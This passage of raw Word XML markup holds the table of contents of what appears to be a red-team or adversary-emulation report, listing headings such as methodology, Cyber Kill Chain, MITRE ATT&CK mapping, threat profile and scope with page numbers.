              <w:instrText xml:space="preserve"> PAGEREF _Toc213253533 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="58E3543E" w14:textId="4E63B99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34" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>1.2.3.</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Findings and recommendations</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253534 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2423AE5C" w14:textId="131026D2"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35" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>1.2.4.</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Other recommendations</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253535 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="07E4BF1D" w14:textId="4A69F6CD" w:rsidR="00F27A8E" w:rsidRPr="001019D3" w:rsidRDefault="00F27A8E">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="en-IE"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc213253536" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-IE"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Methodology</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253536 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6D847E25" w14:textId="22C805FB"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37" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof w:val="0"/>
              </w:rPr>
              <w:t>2.1.</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Introduction</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253537 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0EE83DA4" w14:textId="2A0FE1CF"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38" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof w:val="0"/>
              </w:rPr>
              <w:t>2.2.</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The “Cyber Kill Chain” framework by Lockheed Martin</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253538 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7E917B24" w14:textId="1A5F8C4F"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39" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof w:val="0"/>
              </w:rPr>
              <w:t>2.3.</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Cyber Kill Chain mapping to the MITRE ATT&amp;CK matrix</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253539 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2E2E079E" w14:textId="4D6FC046"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40" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof w:val="0"/>
              </w:rPr>
              <w:t>2.4.</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Adversary emulation plan</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253540 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="36E715D6" w14:textId="7897711D"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41" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof w:val="0"/>
              </w:rPr>
              <w:t>2.5.</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Code of conduct</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253541 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5A3D79A0" w14:textId="4D17B538"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42" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof w:val="0"/>
              </w:rPr>
              <w:t>2.6.</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Report interpretation</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253542 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="036FC286" w14:textId="2FAA384E"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43" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>2.6.1.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Attacker skill level</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253543 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="71864886" w14:textId="73027D5C"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44" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>2.6.2.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Goals and objectives</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253544 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="47991F36" w14:textId="51D96DFB"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45" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>2.6.3.</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Findings</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253545 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="584F2F0F" w14:textId="16ACA2D0"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46" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>2.6.4.</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MITRE ATT&amp;ACK</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253546 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="70CD477C" w14:textId="1B1573A1" w:rsidR="00F27A8E" w:rsidRPr="001019D3" w:rsidRDefault="00F27A8E">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="en-IE"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc213253547" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-IE"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Campaign overview</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253547 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0E3C559D" w14:textId="55F343C8"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48" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof w:val="0"/>
              </w:rPr>
              <w:t>3.1.</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Scenario</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253548 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3BAD1B5D" w14:textId="6634001A"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49" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>3.1.1.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External or outsider perspective</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253549 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7AFF8284" w14:textId="0FB7210E"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50" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>3.1.2.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Internal or insider perspective</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253550 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="373F09F3" w14:textId="4E20C641"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51" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof w:val="0"/>
              </w:rPr>
              <w:t>3.2.</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Threat profile</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253551 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="086D7CD5" w14:textId="136F64BE"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52" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof w:val="0"/>
              </w:rPr>
              <w:t>3.3.</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Scope</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
